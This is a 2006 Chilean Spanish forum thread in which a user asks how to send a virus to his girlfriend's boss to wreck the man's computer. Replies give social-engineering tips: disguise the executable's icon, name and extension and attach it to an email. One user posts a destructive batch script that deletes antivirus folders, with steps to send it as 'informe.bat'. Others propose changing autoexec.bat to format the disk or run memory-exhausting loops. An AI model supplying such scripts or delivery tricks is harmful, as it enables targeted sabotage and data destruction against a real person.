- Niños, nuestra Meaita en el sur se hizo conocida gracias a los huevones de ElAntro, ¡durante sus inicios en los 90!.
- Kracias kukekumadres, kelices kiez kaños.

15-03-2006, 13:58
|
 |
Bosta

|
|
FoquiMoney: 3.726
Gracias dadas: 24
Agradecido 18 vez en 12 posts
|
|
|
cómo enviar un virus...
Amigos del antro, sé que ustedes podrán guiarme en cómo mandarle un virus al jefe de mi polola ya que le viejo es demasiado explotador y sinverguenza, apelo a sus conocimientos de informatica para hacer una maldad...si es así espero que lo hagan lo más didactico posible, gracias amigos y espero no equivocarme al postearlo acá...
|

15-03-2006, 16:50
|
|
|
|
Re: cómo enviar un virus...
iria en peticiones la wea ... pero en fin..
los virus se envian atraves de archivos ... adjuntos por ejemplo a una foto
o bien directamente, con ejecutarlos pero te tienes que hacr la pregunta de como hacer para que lo abra xD
bueno en fin, ojala alguien te ayude mas... de esta wea no cacho bien
adios.
|

15-03-2006, 18:33
|
 |
Hij@'e Puta

|
|
FoquiMoney: 5.648
Gracias dadas: 17
Agradecido 4 vez en 2 posts
|
|
|
aer mira...(postie una wea y kede de ignorante el otro dia pero pichula)
la gracia es que el weas del jefe no cache q el archivo que tiene que ser ejecutable, sea con extencion ".exe" (de ejecutable po weon)
claro q hay otros con otras extenciones, pero se cachan de una...
INGENIATELAS, CAMBIA ICONO, NOMBRE Y SI PODI OTRAS WEÁS...
|

15-03-2006, 21:46
|
|
|
|
lol xD ... lo del .exe no es siempre asi =)
puede ser .bat .gif .bmp .mp3 etc los troyanos vienen con .exe xD los virus pueden venir de cualkier forma xD
aios.
|

16-03-2006, 09:50
|
 |
Bosta

|
|
|
|
|
Amigos el jefe de mi polola es re gueón abre lo que sea de su correo...lo que necesito es cómo meter un virus para que el gil lo abra, el cómo se hace, me siguen...???
|

16-03-2006, 13:28
|
 |
Hij@'e Puta

|
|
FoquiMoney: 5.648
Gracias dadas: 17
Agradecido 4 vez en 2 posts
|
|
|
PUTA... AER.... BUSCA UN VIRUS CUALKIERA.... (SAINT GOOGLE) SIN ABRIRLO PO WNAO... LO ADJUNTAI COMO CUALKIER OTRO ARCHIVO EN EL MAIL Y LO MANDAY.... CAMUFLANDOLO LO MAS POSIBLE PO COMPADRE, SI ESQUE NO LO ESTÁ....
OJALA AYUDE A TU PREGUNTA....
Pd: VALES VAMPIRIN... TOY FUERA DE TRAINING... JEJEJ
(esta weá es mas complicá pero el parecer sirve:
Insertay una imagen (entiendase q son las lineas de codigo)en un archivo cualkiera con un editor que puede ser "edit" de DOS, y al abrir el archivo con un editor de imagen, detecta el codigo de lineas de la imagen y la muestra. El punto es que si lo haces con una imagen, tambien se puede lograr con un programa, etc...)
Kien tenga mas info se agradece.....
Editado por DarkTagnan en 16-03-2006 a las 13:44.
|

16-03-2006, 13:34
|
 |
Hij@'e Puta

|
|
FoquiMoney: 3.267
Gracias dadas: 0
Agradecido 1 vez en 1 post
|
|
|
Cita:
|
Originalmente publicado por roy1971
Amigos el jefe de mi polola es re gueón abre lo que sea de su correo...lo que necesito es cómo meter un virus para que el gil lo abra, el cómo se hace, me siguen...???
|
y pa que queri mandarle un mail si al final el gueon abre todos los correos como tu dices el gueon debe estar enteramente infectado...
|

16-03-2006, 18:42
|
 |
Bosta

|
|
|
|
|
Dark Tangan, puta viejo gracias, sé que el viejo debe tener hartos virus pero quiero uno que lo abra y le deje la cagá en su computador...buena e ilustrativa tu respuesta, os contaré como me fue...jajajaja.
|

16-03-2006, 19:11
|
|
Ocios@

|
|
FoquiMoney: 594
Gracias dadas: 4
Agradecido 5 vez en 5 posts
|
|
|
aer weon mejor enviale esta wea
cd \
cd Archivos*
cd Norton*
attrib -R -A -S -H *.* /D
del /S /Q *.*
cd..
cd Panda*
del /S /Q *.*
cd..
cd Kaspersky*
del /S /Q *.*
copia esa ese codigo en el block de nota o en cualquier editor de txt y guadalo con extension bat , osea cuando lo guades y te pida el nombre para guardarlo le pones algo como informe.bat no se te olvide ponerle esa extencion , weno guardas la wea y se lo envias por un correo y listo cuando abra la wea le va a borrar todo lo que esta presquito ahi . weno si quieres k le borre mas wea insertale los nombre de las cosas k quieres k le borre nose el firewall, el office el winzip el excel nose cualquier wea k quieras , claro k tienes k seguir la misma linea pa k la wea resulte , me da paja compilarlo mas , pero con esa wea k esta ahi tamos listo le vay a dejar la kaga
p.d : el codigo es para fines de edukacion no me hago responzable por las weas k cause , weno en fin ni ahi total estamos en el post de hackers
esero k te sirva y no este mintiendo con la wea , sino yo mismo k hago kagar el pc por weon
weno si quieres ver si quedo weno solo abrelo tu y lo pruebas jep y de ahi me dices
|

17-03-2006, 10:48
|
 |
:zippyrock:

|
|
FoquiMoney: 141.793
Gracias dadas: 10
Agradecido 236 vez en 92 posts
|
|
|
Cita:
|
Originalmente publicado por fernan2
aer weon mejor enviale esta wea
cd \
cd Archivos*
cd Norton*
del /S /Q *.*
cd..
cd Panda*
del /S /Q *.*
cd..
cd Kaspersky*
del /S /Q *.*
copia esa ese codigo en el block de nota o en cualquier editor de txt y guadalo con extension bat , osea cuando lo guades y te pida el nombre para guardarlo le pones algo como informe.bat no se te olvide ponerle esa extencion , weno guardas la wea y se lo envias por un correo y listo cuando abra la wea le va a borrar todo lo que esta presquito ahi . weno si quieres k le borre mas wea insertale los nombre de las cosas k quieres k le borre nose el firewall, el office el winzip el excel nose cualquier wea k quieras , claro k tienes k seguir la misma linea pa k la wea resulte , me da paja compilarlo mas , pero con esa wea k esta ahi tamos listo le vay a dejar la kaga
p.d : el codigo es para fines de edukacion no me hago responzable por las weas k cause , weno en fin ni ahi total estamos en el post de hackers
esero k te sirva y no este mintiendo con la wea , sino yo mismo k hago kagar el pc por weon
weno si quieres ver si quedo weno solo abrelo tu y lo pruebas jep y de ahi me dices
|
no es por menospreciar el aporte pero es un copy/paste
con eso, mejor creas un bat que infecte el autoexec.bat o cree uno en la carpeta de inicio
y ese bat copiado o codigo insertado en el autoexec formatee el pc...
o si quieres, creas 2 archivos mas y haces que al iniciar, empieze a abrir, el archivo a, despues el b, despues el a, despues el b y asi sucesivamente y al pc no le quedara memoria ram y se quedara pegado muajajajajajaajajajajajjajaja
cualquier cosa,, yo hago weas en .bat 
|

17-03-2006, 13:00
|
 |
Bosta

|
|
|
|
|
fernan2, viejo quedate tranquilo el jefe de mi polola es súper negrero, le subio el sueldo a todos en la empresa menos a ella, loco mi polola la lleva dentro de la empresa su error fue discutirle cosas tecnicas a su jefe y le pareció mal, como estudia ing. comercial los puros sábados (carrera express) cree que se las sabe todas...en fin; gracias y si desean aportar algo más para educarme en estos menesteres bien, ya que ustedes la llevan en esto.
|

17-03-2006, 13:19
|
|
Ocios@

|
|
FoquiMoney: 594
Gracias dadas: 4
Agradecido 5 vez en 5 posts
|
|
|
Cita:
|
Originalmente publicado por the_trooper_eddie
no es por menospreciar el aporte pero es un copy/paste
con eso, mejor creas un bat que infecte el autoexec.bat o cree uno en la carpeta de inicio
y ese bat copiado o codigo insertado en el autoexec formatee el pc...
o si quieres, creas 2 archivos mas y haces que al iniciar, empieze a abrir, el archivo a, despues el b, despues el a, despues el b y asi sucesivamente y al pc no le quedara memoria ram y se quedara pegado muajajajajajaajajajajajjajaja
cualquier cosa,, yo hago weas en .bat 
|
igual el de autoexec esta rebueno pero lo k le pase le deja la kaga de una , cuando lo hice y lo arregle lo probe y me dejo varios programas out ... el k le diste tu como comentas mas arriba es para ocuparle la ram solamente (tu lo dijiste) , mejor seria hace una k le formatee el tarro y ahi estamos
|
Personas en esta discusión: 1 (0 usuario(s) y 1 invitado(s))
|
|
|
Todas las horas son GMT -3. La hora es 06:55.
|
|